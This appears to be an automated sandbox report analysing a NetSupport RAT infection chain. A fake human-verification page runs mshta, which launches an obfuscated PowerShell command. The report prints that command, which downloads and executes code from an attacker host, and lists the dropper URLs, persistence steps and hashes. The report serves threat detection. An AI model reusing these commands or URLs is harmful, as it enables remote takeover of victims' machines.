netsupport | hxxp://pwctrustlaw[.]com

Analysis

max time kernel
140s
max time network
143s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
11-12-2024 16:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://pwctrustlaw.com

Score

10^/10

netsupport defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://pwctrustlaw.com/Ray-verify.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://patbunn.com/o/o.png

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport

Blocklisted process makes network request 4 IoCs

flow	pid	Process
32	4620	mshta.exe
37	4620	mshta.exe
41	4620	mshta.exe
46	4808	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
2316	client32.exe

Loads dropped DLL 5 IoCs

pid	Process
2316	client32.exe
2316	client32.exe
2316	client32.exe
2316	client32.exe
2316	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\svHAPn\\client32.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4808	powershell.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5060	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2084	ipconfig.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784085199150272"	chrome.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
464	chrome.exe
464	chrome.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
3096	chrome.exe
3096	chrome.exe
3096	chrome.exe
3096	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe
Token: SeCreatePagefilePrivilege	464	chrome.exe
Token: SeShutdownPrivilege	464	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
2316	client32.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe
464	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 464 wrote to memory of 2380	464	chrome.exe	82
PID 464 wrote to memory of 2380	464	chrome.exe	82
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 1708	464	chrome.exe	83
PID 464 wrote to memory of 3056	464	chrome.exe	84
PID 464 wrote to memory of 3056	464	chrome.exe	84
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85
PID 464 wrote to memory of 220	464	chrome.exe	85

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1680	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://pwctrustlaw.com
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa95afcc40,0x7ffa95afcc4c,0x7ffa95afcc58
  2⤵
  PID:2380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:1708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3092 /prefetch:1
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3120 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3056,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3380,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3244 /prefetch:8
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=1620,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5012,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4816 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5144,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5396,i,9619497957724717585,9572575331447873271,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3096

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4804

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pwctrustlaw.com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 4199''
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='##(N##ew-O###bje###ct N###et.W###e'; $c4='b##Cl####ie##nt##).###D###ow#nl##o##'; $c3='a##dSt####ri#####n###g(''http://patbunn.com/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('#','');I`E`X $TC|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4808
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /flushdns
    3⤵
    - Gathers network information
    PID:2084
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\svHAPn
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5060
  - - C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\AppData\Roaming\svHAPn
      4⤵
      Views/modifies file attributes
      PID:1680
- - C:\Users\Admin\AppData\Roaming\svHAPn\client32.exe
    "C:\Users\Admin\AppData\Roaming\svHAPn\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
84879ebe61e4660a3ebd631195735035

SHA1
c5295daedcf11a1983005e3d199ec3dad7e06c6c

SHA256
8dda45f50c8e0bac66231ddab21033ce4d606517a98d18e165a7bd8bdbaf59af

SHA512
9ff0ba937d00d0493042ad04239fad3869bdebbaf92ff90ae1da23868a2405c435e089e95d0a4180fb0e581bb31484c5d89a412f3828f38e612d0c3c8a490f1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
233KB

MD5
5253eee6e27d1c2a4f6b097e23cf7696

SHA1
6912f06eeec6e40fa986c880b3894eddb4ce92bd

SHA256
948b2b105d40622dba63e47bfd13f7f2b5d25439259abbe1ef72877ea4f814a6

SHA512
bb93d74e648cb01599d0dfe68316ae670da2215b50d4b912e61b2acc58ff282580bfe32f1dc8225a09a74cb74181cf76aae82612f24a444a113a2d405cbb5a47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
3d7608e91bceecd8b6a67f059eab6429

SHA1
4d1efa2a70be4d519596086bbf2d47f607b8abf6

SHA256
33f9f4f1cc60b11c7da26144405d1deffdf5abe8524bb90507168a3fb7657737

SHA512
cc61ab1d6929e8ff89ffb618731dbebdc355ebe460d9948267c219bd37ee9e4dc46f86d18d45a370f93fcde1b34d9b2596589583d6f8805f09b1a6997da47375

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
792ee927db1703c15ae03f2570d15494

SHA1
7af8e375777d5a8b9b342644075a14f13ad5ab45

SHA256
fefe695df0f88cb05476aaf2042519baf85682987d60e2e9b5d5d5e570ba1279

SHA512
280298791e451de3271852872238f4de686f9ef02db28bba11cbece8a6aa1d274348ab375c1c8929cf6d465a98b5d519b60830042780c3f907a3e38f92d980ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2f69d2d388710e0bf2ab7326c6d6a856

SHA1
cb28b60ab38a68fc3cba69edec4e7b3404f23699

SHA256
c60da723e8000b5c683082b5a0ddd2621fec0774a2508c1da3ebf4fedb423cb3

SHA512
0491945ef963abea2355e503b75e4129adc0f3c945f54d9dc23e58a83f96b0dddb13eb00592c228b909f37288fc67850ed505d593df06b97ee17fd6dd1b8d7f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4a6a246c1abe572064b7f0155eee6a62

SHA1
11894f9732ffa0162ed145782cc3c4d6df7b6b62

SHA256
075df3d8b2d56e2b4c8ad558804a26cc228d40d59b052185d253d5966c71384c

SHA512
b72b35b6f94d52ec409256a4850923349bd12ce5cb4e1013e33c8ce28d9fb7c80f1eadc262ccd6cd48beb0653785057b0c625141ab89dba8a46a2c5e4565e6b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bd13106b87197a3dc6fbf387bb8f090a

SHA1
3dbb12387a44b2d1ec8481507b09cf7f099f340d

SHA256
7a16f6df9f16d96b7709380a4365381958b5c2a0805a1ca2764d4b8549ab5f6d

SHA512
83e57450edb37a17c34201d053a4af2a216084bbc45a3501763cb0ff134ffb66c02b8aa783701e7f1104125933577e8eaebe02b87ccac56d0b931c8317be4f64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
48f0710ac1f4d13c444807f454c0aa0b

SHA1
610067cb8f5e1284b751dcff84e087478ab93899

SHA256
6ea97bb39af05fb475902f3120031d3c14bb0ed63c1537bbf2f8c2bd39157ea0

SHA512
bc54e6271a6380da098eeb80445e9e180468dd6496152387a1276ebd513318038e72878fbb331a33571a737041b47fd6aea0d2c41fb1389ba3462cd23e0f74eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
435238c3257f2897c2e9673186052c79

SHA1
9ed6232ac75fb99ccb7d8030c059b1f7544a8670

SHA256
d0af49a3e679b09c3264c677d84c93f5e0a7c37dc71f92757b12eddc1b10fde5

SHA512
2834155ce30b65b92ec147b202efcf36a0db6b7772749567412a72b54133c1660c171d8b717b4d85b922d019a1fe7187ab1d8dca217afe6875f2f97129b95239

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f55bdb15ee208b969d643663190fe25d

SHA1
a2c45ca268336629ef520a63d8ec9e581bc72bda

SHA256
173f2103ab81c8174518667b9e8981bbc8c01cbc24fdc7578c991fdeaa74ced2

SHA512
6aa49ae2f8624575a6fe1378831372ae99872e3ac553f11081624e574695df8e01f2e151fcb2ea011aa86bcc8d1784302fdf011551706fa2278b0575f4cbda5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
0559f850e4ea29f48acef008fd3046c2

SHA1
d6cf7cbc1a20dc92012f1ff80078c533ad3295b9

SHA256
9ab2300fba32bd94de3fc8946c3c26e12c442911b4244093ef1854071ac7e369

SHA512
5c7e74e71449274cff0cb6a7f040b67324ea9a4e1159a4678903322db4d1e804d8c6e5311c4c773a343ed0304d92f404fbbe82bfd9f4b2658d7c32d9f5b654bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e9f9a82ba1de5e039197a06f920cd56c

SHA1
29208bd54c16c96da4e9adf0609b16577b09ab81

SHA256
b866f9625e510c86d0d49e7b32fecb180c8170603c21eec0138e9b287ccfb6b7

SHA512
2734553b159a0d1721e55329f70408f336065a6cb70c276ca2c026f10621053468e38b9e470259abe70fe8c833c1c38ba1d4924de14e385c7abe322c8fe591a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
118KB

MD5
9885d52d3a832fe4588a2dcd3bc1aaa8

SHA1
ba9f3cbac6dc0c3902bcddc44405ba09a440e281

SHA256
73d2ddab7dbb2d78755f6fe36a80f16d6a4327a6601875e008c832ae70d12152

SHA512
7a5f7c44675137cd3d3df68f65fddcadb2657df6939541d0c87c65e89da38577b922f8c3462384e505116bde478e80397fb5f98969970c24116d4af20bf4b440

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
118KB

MD5
3ab333e2217cc8de89103f7d885623a6

SHA1
b0239fc44302db1b96fec83aa16527e8ca6e3200

SHA256
02abdb1af8c40ef9e075c2ddb783c9f08935877a88a9e835dc59c5983fdfd4a1

SHA512
790f8b4e91e54c019c35cce548e68d1b3de1dea15184f624bf48df072f3bc4fb762c98bc73342b39cf0db0ad0af2c2867c5448e1850adc28d4493f02f5b0f226

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ac1eb170-0649-4081-93dd-1788a063d585.tmp

Filesize
118KB

MD5
198ab52558705c0808a13a08458b7673

SHA1
e8bbe43fa8fce473547ea8d34609362b0fdbb233

SHA256
aab66d0640e91a4151e81bbe4e21b6f7d6ce74769725d105623446424c0fb63c

SHA512
b47201fa34a026265ec72dd90d3695ff2f935ecb16a1b1148be758b86803fda992a72d6b61d6d414516e24c9591aead69e339265c4e33e06b918192a81cb9ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvmxotrf.tb2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
